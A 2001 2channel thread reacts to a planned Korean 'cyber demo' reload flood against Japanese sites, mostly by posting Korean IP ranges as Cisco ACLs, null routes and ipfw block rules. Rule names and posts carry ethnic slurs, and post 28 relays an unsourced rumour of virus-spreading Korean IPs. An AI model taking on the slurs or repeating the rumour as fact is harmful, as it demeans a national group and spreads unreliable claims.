5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

韓国が8・15に日本サイトを「サイバー・デモ」

1 :またかよ:2001/08/10(金) 12:42
「神社参拝に抗議」15日、対日サイバーデモ
http://japanese.chosun.com/site/data/html_dir/2001/08/10/20010810000001.html
 韓国ネティズンは、光復節の今月15日、日本首相の靖国神社参拝と歴史教科書のわい曲に抗議するサイバーデモを、日本の極右団体のインターネットサイトで行うことにした。
 10日、「日本の歴史教科書改悪阻止運動本部」など、歴史わい曲教科書反対運動団体のインターネットホームページの掲示板には、サイバーデモの同参を呼びかける文章が次々と載せられ、照会も1件当たり数百件を超えている。

 これらネティズンは、文部科学省と産経新聞、自民党、新しい歴史教科書をつくる会など6団体のホームページアドレスを掲載し、同日同時に接続し、サイトをストップさせる計画だ。

 また、効果的な同時接続を図るため、接続の時間を決め、今月15日午前9時と12時、午後3時と6時、9時の5回に渡り、これら団体のサイトを無差別訪問し「仮想の座り込みデモ」を行うことにした。

2 :名無しさん@お腹いっぱい。:2001/08/10(金) 12:43
ニュー速でやってNE!

3 :在日:2001/08/10(金) 12:44
ゴメンヨ
韓国のキーボードはF5を外した方がいいね…

4 ::2001/08/10(金) 12:46
>>2 セキュリティに関する話題だと思うが・・・
これだけ事前通告されといて、韓国ヒッキーのなすがまま
にされたら日本のセキュリティ対策が笑われる。

5 :以前のF5連打デモの時は:2001/08/10(金) 13:23
krドメインをプロバイダ側ではねたら、韓国側が「つながらない」
と文句言ってきたそうです(笑)↓一体何を考えてるのだろう。

http://www.koreanavi.com/news/headline/20010615-3.html
ハナロ通信と韓国通信のプロバイダ接続では、同日から13日まで産経新聞社と北海道議会のホームページがつながらなかったが、14日に産経新聞社のホームページがようやく閲覧できた。しかし北海道議会は「HTTP500−内部サーバーエラー」という表示が出て依然そのままだ。
コンピュータからホストまでの到達経路をたどる特定コマンドで確認したところ、接続要求は韓国側を出て、日本側の途中までいったところで途切れてしまう。
当時の報道によると、北海道議会のホームページへの接続業者が韓国からの接続要求に対するパケットになんらかのフィルタリングを行った模様で、日本側の対応が遅れている可能性もある。ハナロ通信の接続障害係も「日本側に問題があるようです」としている。

6 :名無しさん@お腹いっぱい。:2001/08/10(金) 15:42
あほだ・・・

7 :名無しさん@お腹いっぱい。:2001/08/10(金) 15:49
わざわざやんなくても…

8 :名無しさん@お腹いっぱい。:2001/08/10(金) 15:57
他国を攻撃する前にcode redをどうにかして欲しいな>おとなりさん。

9 :名無しさん@お腹いっぱい。:2001/08/10(金) 17:07
目には目を。

10 :  :2001/08/10(金) 17:21
やっぱ皆でDDoS攻撃なの?

11 :名無しさん@お腹いっぱい。:2001/08/10(金) 18:54
つーか、krをフィルタリングすればいいんじゃないの、とりあえず
平和的解決で

12 ::2001/08/10(金) 18:59

どうでもいいけど、
「手作業DDoS」
ってのもなんだかなあ。。

13 :名無しさん@お腹いっぱい。:2001/08/10(金) 19:00
日本の右翼団体のweb server韓国に置けば日本国内問題ナシ

14 :名無しさん@お腹いっぱい。:2001/08/10(金) 20:14
>>13
物理的に壊されるよ(w

15 :名無しさん@お腹いっぱい。:2001/08/10(金) 20:24
krフィルタリング賛成。
テロが起きると噂がながれているのだから、警備(フィルタリング)を強化するのは
あたりまえのこと。
不審者(krからのパケット)をシャットアウトするのは当然の処置だね。

16 :名無しさん@お腹いっぱい。:2001/08/10(金) 20:37
まあ手動でリロード連発しかやらんといってるのだから、
せいぜいログがいっぱいにならないようにしておいて
やらせてあげれば?

17 ::2001/08/10(金) 20:44
【またか】韓国ネチズンが8/15に対日サイバーデモ
http://kaba.2ch.net/test/read.cgi?bbs=news&key=997443316

18 :Fiνe:2001/08/10(金) 21:35
はい、韓国のIPアドレスリスト
ルーターに食わせても、Apacheに食わせてもOK

61.32.0.0 - 61.47.255.255 : 61.32/12 : 61.32.0 - 61.55.255
61.48.0.0 - 61.55.255.255 : 61.48/13 : 61.32.0 - 61.55.255
61.72.0.0 - 61.79.255.255 : 61.72/13 : 61.72.0 - 61.111.255
61.80.0.0 - 61.95.255.255 : 61.80/12 : 61.72.0 - 61.111.255
61.96.0.0 - 61.111.255.255 : 61.96/12 : 61.72.0 - 61.111.255
61.248.0.0 - 61.255.255.255 : 61.248/13 : 61.248.0 - 61.255.255
202.6.95.0 - 202.6.95.255 : 202.6.95/24 : 202.6.95 - 202.6.95
202.14.103.0 - 202.14.103.255 : 202.14.103/24 : 202.14.103 - 202.14.103
202.14.165.0 - 202.14.165.255 : 202.14.165/24 : 202.14.165 - 202.14.165
202.20.82.0 - 202.20.83.255 : 202.20.82/23 : 202.20.82 - 202.20.86
202.20.84.0 - 202.20.85.255 : 202.20.84/23 : 202.20.82 - 202.20.86
202.20.86.0 - 202.20.86.255 : 202.20.86/24 : 202.20.82 - 202.20.86
202.20.99.0 - 202.20.99.255 : 202.20.99/24 : 202.20.99 - 202.20.99
202.20.119.0 - 202.20.119.255 : 202.20.119/24 : 202.20.119 - 202.20.119
202.20.128.0 - 202.20.255.255 : 202.20.128/17 : 202.20.128 - 202.21.7
202.21.0.0 - 202.21.7.255 : 202.21.0/21 : 202.20.128 - 202.21.7
202.30.0.0 - 202.31.255.255 : 202.30/15 : 202.30.0 - 202.31.255
203.224.0.0 - 203.255.255.255 : 203.224/11 : 203.224.0 - 203.255.255
210.90.0.0 - 210.91.255.255 : 210.90/15 : 210.90.0 - 210.127.255
210.92.0.0 - 210.95.255.255 : 210.92/14 : 210.90.0 - 210.127.255
210.96.0.0 - 210.127.255.255 : 210.96/11 : 210.90.0 - 210.127.255
210.178.0.0 - 210.179.255.255 : 210.178/15 : 210.178.0 - 210.183.255
210.180.0.0 - 210.183.255.255 : 210.180/14 : 210.178.0 - 210.183.255
210.204.0.0 - 210.207.255.255 : 210.204/14 : 210.204.0 - 210.207.255
210.216.0.0 - 210.223.255.255 : 210.216/13 : 210.216.0 - 210.223.255
211.32.0.0 - 211.63.255.255 : 211.32/11 : 211.32.0 - 211.63.255
211.104.0.0 - 211.111.255.255 : 211.104/13 : 211.104.0 - 211.119.255
211.112.0.0 - 211.119.255.255 : 211.112/13 : 211.104.0 - 211.119.255
211.168.0.0 - 211.175.255.255 : 211.168/13 : 211.168.0 - 211.255.255
211.176.0.0 - 211.191.255.255 : 211.176/12 : 211.168.0 - 211.255.255
211.192.0.0 - 211.255.255.255 : 211.192/10 : 211.168.0 - 211.255.255

19 :名無しさん:2001/08/10(金) 21:38
だれか、↑ ↑ ↑ を、IOSのアクセスリストとApacheの
アクセスリストに直せ!!

20 :名無し娘。:2001/08/10(金) 21:40
>>18 でipchainsのルールもつくれやゴルァ!!

21 :名無しさん@お腹いっぱい。:2001/08/10(金) 21:53
>>20 スクリプト自分で作れゴルァ!!

22 :Fiνe:2001/08/10(金) 22:22
IOS 12.x用の名前付きaclの場合は、

ip access-list standard FuckKorea
deny 61.32.0.0 0.15.255.255
deny 61.48.0.0 0.7.255.255
deny 61.72.0.0 0.7.255.255
deny 61.80.0.0 0.15.255.255
deny 61.96.0.0 0.15.255.255
deny 61.248.0.0 0.7.255.255
deny 202.6.95.0 0.0.0.255
deny 202.14.103.0 0.0.0.255
deny 202.14.165.0 0.0.0.255
deny 202.20.82.0 0.0.1.255
deny 202.20.84.0 0.0.1.255
deny 202.20.86.0 0.0.0.255
deny 202.20.99.0 0.0.0.255
deny 202.20.119.0 0.0.0.255
deny 202.20.128.0 0.0.127.255
deny 202.21.0.0 0.0.7.255
deny 202.30.0.0 0.1.255.255
deny 203.224.0.0 0.31.255.255
deny 210.90.0.0 0.1.255.255
deny 210.92.0.0 0.3.255.255
deny 210.96.0.0 0.31.255.255
deny 210.178.0.0 0.1.255.255
deny 210.180.0.0 0.3.255.255
deny 210.204.0.0 0.3.255.255
deny 210.216.0.0 0.7.255.255
deny 211.32.0.0 0.31.255.255
deny 211.104.0.0 0.7.255.255
deny 211.112.0.0 0.7.255.255
deny 211.168.0.0 0.7.255.255
deny 211.176.0.0 0.15.255.255
deny 211.192.0.0 0.63.255.255
permit any
!

23 :Fiνe:2001/08/10(金) 22:23
IOS11.xでも使えるやつ

access-list 82 deny 61.32.0.0 0.15.255.255
access-list 82 deny 61.48.0.0 0.7.255.255
access-list 82 deny 61.72.0.0 0.7.255.255
access-list 82 deny 61.80.0.0 0.15.255.255
access-list 82 deny 61.96.0.0 0.15.255.255
access-list 82 deny 61.248.0.0 0.7.255.255
access-list 82 deny 202.6.95.0 0.0.0.255
access-list 82 deny 202.14.103.0 0.0.0.255
access-list 82 deny 202.14.165.0 0.0.0.255
access-list 82 deny 202.20.82.0 0.0.1.255
access-list 82 deny 202.20.84.0 0.0.1.255
access-list 82 deny 202.20.86.0 0.0.0.255
access-list 82 deny 202.20.99.0 0.0.0.255
access-list 82 deny 202.20.119.0 0.0.0.255
access-list 82 deny 202.20.128.0 0.0.127.255
access-list 82 deny 202.21.0.0 0.0.7.255
access-list 82 deny 202.30.0.0 0.1.255.255
access-list 82 deny 203.224.0.0 0.31.255.255
access-list 82 deny 210.90.0.0 0.1.255.255
access-list 82 deny 210.92.0.0 0.3.255.255
access-list 82 deny 210.96.0.0 0.31.255.255
access-list 82 deny 210.178.0.0 0.1.255.255
access-list 82 deny 210.180.0.0 0.3.255.255
access-list 82 deny 210.204.0.0 0.3.255.255
access-list 82 deny 210.216.0.0 0.7.255.255
access-list 82 deny 211.32.0.0 0.31.255.255
access-list 82 deny 211.104.0.0 0.7.255.255
access-list 82 deny 211.112.0.0 0.7.255.255
access-list 82 deny 211.168.0.0 0.7.255.255
access-list 82 deny 211.176.0.0 0.15.255.255
access-list 82 deny 211.192.0.0 0.63.255.255
access-list 82 permit any

24 :Fiνe:2001/08/10(金) 22:26
で、これを、
int XXX
ip access-group FuckKorea in
とか、
int XXX
ip access-group 82 in
とかで、インターネット側のインタフェースに割り当ててね
>攻撃対象のサイトのネット管理者

25 :  :2001/08/10(金) 22:35
帰ってきたの (^ ^ )?
Fiνe たん

26 :Fiνe:2001/08/10(金) 22:53
ルーティングするのもいやな人は、

ip route 61.32.0.0 255.240.0.0 Null 0
ip route 61.48.0.0 255.248.0.0 Null 0
ip route 61.72.0.0 255.248.0.0 Null 0
ip route 61.80.0.0 255.240.0.0 Null 0
ip route 61.96.0.0 255.240.0.0 Null 0
ip route 61.248.0.0 255.248.0.0 Null 0
ip route 202.6.95.0 255.255.255.0 Null 0
ip route 202.14.103.0 255.255.255.0 Null 0
ip route 202.14.165.0 255.255.255.0 Null 0
ip route 202.20.82.0 255.255.254.0 Null 0
ip route 202.20.84.0 255.255.254.0 Null 0
ip route 202.20.86.0 255.255.255.0 Null 0
ip route 202.20.99.0 255.255.255.0 Null 0
ip route 202.20.119.0 255.255.255.0 Null 0
ip route 202.20.128.0 255.255.128.0 Null 0
ip route 202.21.0.0 255.255.248.0 Null 0
ip route 202.30.0.0 255.254.0.0 Null 0
ip route 203.224.0.0 255.224.0.0 Null 0
ip route 210.90.0.0 255.254.0.0 Null 0
ip route 210.92.0.0 255.252.0.0 Null 0
ip route 210.96.0.0 255.224.0.0 Null 0
ip route 210.178.0.0 255.254.0.0 Null 0
ip route 210.180.0.0 255.252.0.0 Null 0
ip route 210.204.0.0 255.252.0.0 Null 0
ip route 210.216.0.0 255.248.0.0 Null 0
ip route 211.32.0.0 255.224.0.0 Null 0
ip route 211.104.0.0 255.248.0.0 Null 0
ip route 211.112.0.0 255.248.0.0 Null 0
ip route 211.168.0.0 255.248.0.0 Null 0
ip route 211.176.0.0 255.240.0.0 Null 0
ip route 211.192.0.0 255.192.0.0 Null 0

27 :Fiνe:2001/08/10(金) 23:05
>>25
>帰ってきたの
もともとどこにもいってないのです
ずっとここにいるのです
「Five」ではないのです

28 :nanasi:2001/08/10(金) 23:51
885 名前:必見!!! 投稿日:2001/08/10(金) 21:02 ID:CSHhUaC6

なにげにQ&A掲示板を見てたら、とんでもない事が書いてあった!!
これが本当なら大問題じゃないか?
------------------------------------------------
少し、教えてください。
日本語の環境で全部の掲示板の韓国の人が書いた文章を読む時に、3回ずつ、不特定のipアドレスに情報を送信(受信)しているようです。
送信(受信)を遮断しても、問題無く動いていますが、どのような目的で、不特定のアドレスにアクセスするのでしょうか?
ipアドレスに直接接続をすると、多くの場合、韓国のsiteに行きますが、「現在更新中」「アクセスの権限がありません」などのメッセージが表示されます。
通常は、問題が無いようですが、ときどき、computer virusを送るsiteに接続されて、警告が表示されます。
韓国語の環境で、掲示板を読んだ時には、アクセスしないようです。
何か、特別な事情があるのでしょうか?

通信をしようとしているipは、
61.73.7.63
61.155.4.228
61.74.161.100
61.136.119.231
61.218.23.34
61.78.138.47
61.73.243.201
そして
61.76.214.84 ===> virusを含むsiteに接続をしようとします。(site名はfuck china government fuck poizonbox)
などです。
他にも、多くありますが、本当に一部のipです。
直接ipを指定して、アクセスした場合、virus警告が表示されるsiteもあります。
共通しているのは先頭の「61」の部分です。
それ以外のipの設定には、どのような規則があるのかわからないです。
全部、netomoの掲示板で、掲載者がkrの場合にだけ、接続しようとするようです。
security softwareの履歴を見る限り、韓国語から日本語への変換をする場合に発生するように感じます。

追加)virus checkのsoftwareをinstallしていないpcで、61.76.214.84に接続すると、接続した時点で、virusに感染します。

29 :ななしさん:2001/08/11(土) 00:57
参詣、紋部下学省、不走者、つくる怪にこのスレをおくろうYO!

30 :名無しさん@お腹いっぱい。:2001/08/11(土) 01:09
REJECT KOREANバナーとか貼るサイトも出現しそうだね。

31 :名無しさん@お腹いっぱい。:2001/08/11(土) 01:12
そうだそうだ!

32 :ななしさん:2001/08/11(土) 01:32
>>22 をセットして、
interface BRI0
  ip access-group FuckKorea in
ってさっきルータに設定
みんなでブロックしようYO!

33 :ななしさん:2001/08/11(土) 01:35
うちにきたCodeRedって、
>>18 の範囲のがほとんど
これでうざいCodeRedもすくなくなりそう

34 :名無しさん :2001/08/11(土) 02:08
>>33
つっこみ入れるべきなんだろうか・・・。

ほとんど韓国が感染してるんだから当然

35 :名無しさん@お腹いっぱい。:2001/08/11(土) 03:05
うちのルータにこのアクセスリストをセットしたんだけど、
びっくりするほど静かになったよ
CodeRedだけじゃなく、その他の攻撃も、3分の1以下
やっぱ、korea遮断するとしずかでいいねぇ
今日は熟睡できそうです

36 :迷惑な国:2001/08/11(土) 03:13
>>18 すごいっすね〜
これって、やっぱりカンコックなんですよねー まったく。

37 :名無しさん@お腹いっぱい。:2001/08/11(土) 06:41
アクセスリストあっぷしてくれた方に感謝!!
自鯖なんだけど、不愉快なXXXが激減した
(煽りじゃなくて本当)、少なくとも個人鯖だったら
krを遮断しても一切問題ないからね

38 :名無しさん@お腹いっぱい。:2001/08/11(土) 09:35
つか、krはみんなで遮断しろ。
サイバーテロとか容認してる国とわざわざ接続してやる必要はないだろ。
ネット死刑マンセー

39 :名無しさん@お腹いっぱい。:2001/08/11(土) 10:13
ipfwルールアプ〜

ipfw add 1 deny ip from 61.32.0.0:255.240.0.0 to any
ipfw add 1 deny ip from 61.48.0.0:255.248.0.0 to any
ipfw add 1 deny ip from 61.72.0.0:255.248.0.0 to any
ipfw add 1 deny ip from 61.80.0.0:255.240.0.0 to any
ipfw add 1 deny ip from 61.96.0.0:255.240.0.0 to any
ipfw add 1 deny ip from 61.248.0.0:255.248.0.0 to any
ipfw add 1 deny ip from 202.6.95.0:255.255.255.0 to any
ipfw add 1 deny ip from 202.14.103.0:255.255.255.0 to any
ipfw add 1 deny ip from 202.14.165.0:255.255.255.0 to any
ipfw add 1 deny ip from 202.20.82.0:255.255.254.0 to any
ipfw add 1 deny ip from 202.20.84.0:255.255.254.0 to any
ipfw add 1 deny ip from 202.20.86.0:255.255.255.0 to any
ipfw add 1 deny ip from 202.20.99.0:255.255.255.0 to any
ipfw add 1 deny ip from 202.20.119.0:255.255.255.0 to any
ipfw add 1 deny ip from 202.20.128.0:255.255.128.0 to any
ipfw add 1 deny ip from 202.21.0.0:255.255.248.0 to any
ipfw add 1 deny ip from 202.30.0.0:255.254.0.0 to any
ipfw add 1 deny ip from 203.224.0.0:255.224.0.0 to any
ipfw add 1 deny ip from 210.90.0.0:255.254.0.0 to any
ipfw add 1 deny ip from 210.92.0.0:255.252.0.0 to any
ipfw add 1 deny ip from 210.96.0.0:255.224.0.0 to any
ipfw add 1 deny ip from 210.178.0.0:255.254.0.0 to any
ipfw add 1 deny ip from 210.180.0.0:255.252.0.0 to any
ipfw add 1 deny ip from 210.204.0.0:255.252.0.0 to any
ipfw add 1 deny ip from 210.216.0.0:255.248.0.0 to any
ipfw add 1 deny ip from 211.32.0.0:255.224.0.0 to any
ipfw add 1 deny ip from 211.104.0.0:255.248.0.0 to any
ipfw add 1 deny ip from 211.112.0.0:255.248.0.0 to any
ipfw add 1 deny ip from 211.168.0.0:255.248.0.0 to any
ipfw add 1 deny ip from 211.176.0.0:255.240.0.0 to any
ipfw add 1 deny ip from 211.192.0.0:255.192.0.0 to any

40 :名無しさん@お腹いっぱい。:2001/08/11(土) 12:44
初心者にもわかりやすく説明してくれ〜(CODEREDうざいんだよ)

とりあえず上記のものを防ぐためには
なんらかのソフトがいるのか?
ルーターが必要と書いているけどNTTから支給された
ADSLモデム(ルータータイプ)では使えないのか?
使えるとしたらどうやってするのか教えてください(WIN98使用)

41 :名無し:2001/08/11(土) 12:56
>>40
モデムの型番は?

42 :名無しさん@お腹いっぱい。:2001/08/11(土) 13:44
>>39
こういうIPはどうするの?
Pohang Institute of Science and Technology (NET-PIST)
Computer Center POSTECH
P.O. Box 125
Pohang, 790-330
KR

Netname: POSTECH
Netblock: 141.223.0.0 - 141.223.255.255

Coordinator:
Oh, Young-Lee (YO5-ARIN) rhee@VISION.POSTECH.AC.KR
+82-0562-279-2529

Domain System inverse mapping provided by:

VISION.POSTECH.AC.KR 141.223.1.2
NS.KAIST.AC.KR 143.248.1.177
NS.HANA.NM.KR 203.232.127.1

43 :名無しさん@お腹いっぱい。:2001/08/11(土) 13:57
>>43
134.75.0.0 - 134.75.255.255
143.248.0.0 - 143.248.255.255
150.183.0.0 - 150.183.255.255
192.249.24.0 - 192.249.25.255

もっとあると思うが、この辺も抜けてるな。
中途半端な制限かけてるとカンコックに笑われそうだ。

44 :名無しさん@お腹いっぱい。:2001/08/11(土) 14:11
>>43
そんなお前にはこれ。IP NETWORK INDEX
http://www.ipindex.net/

45 :ド素人:2001/08/11(土) 14:21
私もK国を遮断したいんですけど出来ますか?
環境:WIN98、ケーブルネッツ、ケーブルモデム:TZ-CM155(パナソニック)

46 :名無しさん@お腹いっぱい。:2001/08/11(土) 14:29
http://www.google.co.jp/search?q=+site:www.ipindex.net+korea&hl=ja&safe=off&start=10&sa=N

韓国国内のIPを全部拾ったらキリが無いよ。↑見て苦しめや。

47 :名無しさん@お腹いっぱい。:2001/08/11(土) 14:32
>>45
http://ton.2ch.net/test/read.cgi?bbs=sec&key=997283377&st=12&to=12&nofirst=true
そんなお前にはこれ。

48 :名無し:2001/08/11(土) 14:46
>>45
モデムとPCの間にブロードバンドルーターが入っていなければ、
間に入れることをお勧めします。
BA512(NTT-ME)16000円前後です。

49 :名無しさん@お腹いっぱい。:2001/08/11(土) 15:52
>>42
だって元にあったリストが・・・ぶつぶつ。
つーか、おめーらそんなにキムチマン嫌い科!
俺も嫌いだ!!(藁

Class Bとてめーらの意見を反映した。
ただし、19x.x.x.xは誤爆あっても勘弁してくれ。
KRNICでもそこはちゃんと載ってなかった。ばらばらみたいなんで。

61.32.0.0/12
61.48.0.0/13
61.72.0.0/13
61.80.0.0/12
61.96.0.0/12
61.248.0.0/13
128.134.0.0/16
129.254.0.0/16
134.75.0.0/16
137.68.0.0/16
141.223.0.0/16
143.248.0.0/16
147.6.0.0/16
147.43.0.0/16
147.46.0.0/16
147.47.0.0/16
150.150.0.0/16
150.183.0.0/16
150.197.0.0/16
152.99.0.0/16
152.149.0.0/16
154.10.0.0/16
155.230.0.0/16
156.147.0.0/16
157.197.0.0/16

50 :名無しさん@お腹いっぱい。:2001/08/11(土) 15:53
158.44.0.0/16
161.122.0.0/16
163.152.0.0/16
163.180.0.0/16
163.239.0.0/16
163.243.0.0/16
164.124.0.0/16
164.125.0.0/16
165.132.0.0/16
165.133.0.0/16
165.141.0.0/16
165.186.0.0/16
165.194.0.0/16
165.213.0.0/16
165.229.0.0/16
165.243.0.0/16
165.244.0.0/16
165.246.0.0/16
166.79.0.0/16
166.103.0.0/16
166.104.0.0/16
166.125.0.0/16
168.78.0.0/16
168.115.0.0/16
168.126.0.0/16
168.131.0.0/16
168.154.0.0/16
168.188.0.0/16
168.219.0.0/16
192.47.35.0/24
192.100.2.0/24
192.104.15.0/24
192.188.7.0/24
192.249.16.0/24
192.249.17.0/24
192.249.18.0/24
192.249.19.0/24
192.249.20.0/24
192.249.21.0/24
192.249.22.0/24
192.249.23.0/24
192.249.24.0/24
192.249.25.0/24
192.249.26.0/24
192.249.27.0/24
192.249.28.0/24
192.249.29.0/24

51 :名無しさん@お腹いっぱい。:2001/08/11(土) 15:53
192.249.30.0/24
192.249.31.0/24
194.117.100.108/30
195.16.186.0/24
195.16.187.0/24
198.97.145.0/24
198.97.164.0/24
202.6.95.0/24
202.14.103.0/24
202.14.165.0/24
202.20.82.0/23
202.20.84.0/23
202.20.86.0/24
202.20.99.0/24
202.20.119.0/24
202.20.128.0/17
202.21.0.0/21
202.30.0.0/15
203.224.0.0/11
210.90.0.0/15
210.92.0.0/14
210.96.0.0/11
210.178.0.0/15
210.180.0.0/14
210.204.0.0/14
210.216.0.0/13
211.32.0.0/11
211.104.0.0/13
211.112.0.0/13
211.168.0.0/13
211.176.0.0/12
211.192.0.0/10

P.S. 漏れやミスがあっても、もう勘弁してぇ〜。
誰か代わりやってちょ。

52 :名無しさん@お腹いっぱい。:2001/08/11(土) 15:54
ちなみに、KRNICのIP一覧は↓。
http://irms.nic.or.kr/servlet/member.view.ISPIpAddress

53 :名無しさん@お腹いっぱい。:2001/08/11(土) 16:01
P.P.S
誤爆が嫌な人は、19x.x.x.xをリストから抜いてくれい。
そすると、APNIC+KRNICの情報だけになります。
19xはKOREAとかKRとかそれっぽいのを検索しただけなんで、
住所が韓国だが他国の企業って線などもありえます。

54 :40:2001/08/11(土) 16:39
>>41
モデムはNTTから支給されたもので型番は
DSL SB ATUR-E1
です。
本気でCOREREDのアタック頻繁にきて困ってます
ぞぬを入れててブロックはしてくれるんですけど特定の国やIPの
アクセスを遮断するわけではないので・・・・。
マジで教えて欲しいですよ(困

55 :54:2001/08/11(土) 16:41
×CORERED
○CODERED

ADSLモデム以外にDSL用のルータを導入
しないとできないのでしょうか?

56 :名無しさん@お腹いっぱい。:2001/08/11(土) 19:20
>>55
coreredの方が強そうだな。

57 :名無し:2001/08/11(土) 20:48
>>55
http://isweb5.infoseek.co.jp/novel/blueskyz/ を見ると
DSL SB ATUR-E1 にはIPフィルタはないですね。
特定IPを遮断するにはルーターですね。。

58 :名無しさん@お腹いっぱい。:2001/08/11(土) 20:59
>>55
その状況では何も実害はないだろうに、それでも *.kr 嫌いな場合、
BlackICEでは特定のIPアドレス範囲のみ許可したり、弾いたりできるにょ。
古い版ではfirewall.iniを手で変臭していたが最近はGUIで設定可能。
ぞぬ以外にそういうのができるパーソナルファイヤウォールさがしてみれば?
#漏れはこの騒ぎのせいで休眠ルータ取り出してきてつなぎなおした。

59 :名無しさん@お腹いっぱい。:2001/08/11(土) 21:02
>>57
そう。そもそも、EtherはしゃべれどIPはしゃべらない機械なので(管理用I/F除く)。

60 :名無しさん@お腹いっぱい。:2001/08/11(土) 21:21
>>58
ノートンでは可能ですか?
BLACKは安いといえば安いけどノートンだけで十分そうだけど

61 :名無しさん@お腹いっぱい。:2001/08/11(土) 21:29
>>60
持ってないけど、宣伝ページ見ると、ちょっと怪しい。
http://www.symantec.com/region/jp/products/npf2001v3/features.html
・NEW ! インターネットゾーン制御
信頼ゾーン(LAN内)、 制限ゾーン(Internet)の2ゾーン制のような気がする。
これ以外に、「拒否ゾーン」なんてのがないと、目的に合わないよね。たぶん。

62 :61:2001/08/11(土) 21:32
>>60
そろそろスレ違いと言われそうなのですまんけど、
私もネタ切れなのでこの板のノートンスレで質問するのがよいと思う。

63 :名無しさん@お腹いっぱい。:2001/08/11(土) 22:03
スラッシュドットにもこの話題がでてました

ネット的座り込み、じつはただのDoS
http://slashdot.jp/article.pl?sid=01/08/10/2152209&mode=nested&threshold=-1

64 :名無しさん:2001/08/12(日) 00:35
IOS 12.x 用の完全ブロックaccess-list
Part1

ip access-list standard FuckKorea
 deny 61.32.0.0 0.15.255.255
 deny 61.48.0.0 0.7.255.255
 deny 61.72.0.0 0.7.255.255
 deny 61.80.0.0 0.15.255.255
 deny 61.96.0.0 0.15.255.255
 deny 61.248.0.0 0.7.255.255
 deny 128.134.0.0 0.0.255.255
 deny 129.254.0.0 0.0.255.255
 deny 134.75.0.0 0.0.255.255
 deny 137.68.0.0 0.0.255.255
 deny 141.223.0.0 0.0.255.255
 deny 143.248.0.0 0.0.255.255
 deny 147.6.0.0 0.0.255.255
 deny 147.43.0.0 0.0.255.255
 deny 147.46.0.0 0.0.255.255
 deny 147.47.0.0 0.0.255.255
 deny 150.150.0.0 0.0.255.255
 deny 150.183.0.0 0.0.255.255
 deny 150.197.0.0 0.0.255.255
 deny 152.99.0.0 0.0.255.255
 deny 152.149.0.0 0.0.255.255
 deny 154.10.0.0 0.0.255.255
 deny 155.230.0.0 0.0.255.255
 deny 156.147.0.0 0.0.255.255
 deny 157.197.0.0 0.0.255.255
 deny 158.44.0.0 0.0.255.255
 deny 161.122.0.0 0.0.255.255
 deny 163.152.0.0 0.0.255.255
 deny 163.180.0.0 0.0.255.255
 deny 163.239.0.0 0.0.255.255
 deny 163.243.0.0 0.0.255.255
 deny 164.124.0.0 0.0.255.255
 deny 164.125.0.0 0.0.255.255

65 :名無しさん:2001/08/12(日) 00:36
IOS 12.x 用の完全ブロックaccess-list
Part2 ( >>64 のつづき )

 deny 165.132.0.0 0.0.255.255
 deny 165.133.0.0 0.0.255.255
 deny 165.141.0.0 0.0.255.255
 deny 165.186.0.0 0.0.255.255
 deny 165.194.0.0 0.0.255.255
 deny 165.213.0.0 0.0.255.255
 deny 165.229.0.0 0.0.255.255
 deny 165.243.0.0 0.0.255.255
 deny 165.244.0.0 0.0.255.255
 deny 165.246.0.0 0.0.255.255
 deny 166.79.0.0 0.0.255.255
 deny 166.103.0.0 0.0.255.255
 deny 166.104.0.0 0.0.255.255
 deny 166.125.0.0 0.0.255.255
 deny 168.78.0.0 0.0.255.255
 deny 168.115.0.0 0.0.255.255
 deny 168.126.0.0 0.0.255.255
 deny 168.131.0.0 0.0.255.255
 deny 168.154.0.0 0.0.255.255
 deny 168.188.0.0 0.0.255.255
 deny 168.219.0.0 0.0.255.255
 deny 192.249.16.0 0.0.15.255
 deny 202.6.95.0 0.0.0.255
 deny 202.14.103.0 0.0.0.255
 deny 202.14.165.0 0.0.0.255
 deny 202.20.82.0 0.0.1.255
 deny 202.20.84.0 0.0.1.255
 deny 202.20.86.0 0.0.0.255
 deny 202.20.99.0 0.0.0.255
 deny 202.20.119.0 0.0.0.255
 deny 202.20.128.0 0.0.127.255
 deny 202.21.0.0 0.0.7.255
 deny 202.30.0.0 0.1.255.255
 deny 203.224.0.0 0.31.255.255
 deny 210.90.0.0 0.1.255.255
 deny 210.92.0.0 0.3.255.255
 deny 210.96.0.0 0.31.255.255
 deny 210.178.0.0 0.1.255.255
 deny 210.180.0.0 0.3.255.255
 deny 210.204.0.0 0.3.255.255
 deny 210.216.0.0 0.7.255.255
 deny 211.32.0.0 0.31.255.255
 deny 211.104.0.0 0.7.255.255
 deny 211.112.0.0 0.7.255.255
 deny 211.168.0.0 0.7.255.255
 deny 211.176.0.0 0.15.255.255
 deny 211.192.0.0 0.63.255.255
 permit any

66 :名無しさん:2001/08/12(日) 00:41
IOS 12.x 用の部分ブロックaccess-list
Part1

ip access-list extended ShitKorea
 permit udp any any eq domain
 permit tcp any any established
 deny ip 61.32.0.0 0.15.255.255 any
 deny ip 61.48.0.0 0.7.255.255 any
 deny ip 61.72.0.0 0.7.255.255 any
 deny ip 61.80.0.0 0.15.255.255 any
 deny ip 61.96.0.0 0.15.255.255 any
 deny ip 61.248.0.0 0.7.255.255 any
 deny ip 128.134.0.0 0.0.255.255 any
 deny ip 129.254.0.0 0.0.255.255 any
 deny ip 134.75.0.0 0.0.255.255 any
 deny ip 137.68.0.0 0.0.255.255 any
 deny ip 141.223.0.0 0.0.255.255 any
 deny ip 143.248.0.0 0.0.255.255 any
 deny ip 147.6.0.0 0.0.255.255 any
 deny ip 147.43.0.0 0.0.255.255 any
 deny ip 147.46.0.0 0.0.255.255 any
 deny ip 147.47.0.0 0.0.255.255 any
 deny ip 150.150.0.0 0.0.255.255 any
 deny ip 150.183.0.0 0.0.255.255 any
 deny ip 150.197.0.0 0.0.255.255 any
 deny ip 152.99.0.0 0.0.255.255 any
 deny ip 152.149.0.0 0.0.255.255 any
 deny ip 154.10.0.0 0.0.255.255 any
 deny ip 155.230.0.0 0.0.255.255 any
 deny ip 156.147.0.0 0.0.255.255 any
 deny ip 157.197.0.0 0.0.255.255 any
 deny ip 158.44.0.0 0.0.255.255 any
 deny ip 161.122.0.0 0.0.255.255 any
 deny ip 163.152.0.0 0.0.255.255 any
 deny ip 163.180.0.0 0.0.255.255 any
 deny ip 163.239.0.0 0.0.255.255 any
 deny ip 163.243.0.0 0.0.255.255 any
 deny ip 164.124.0.0 0.0.255.255 any
 deny ip 164.125.0.0 0.0.255.255 any

67 :名無しさん:2001/08/12(日) 00:41
IOS 12.x 用の部分ブロックaccess-list
Part2 ( >>65のつづき )

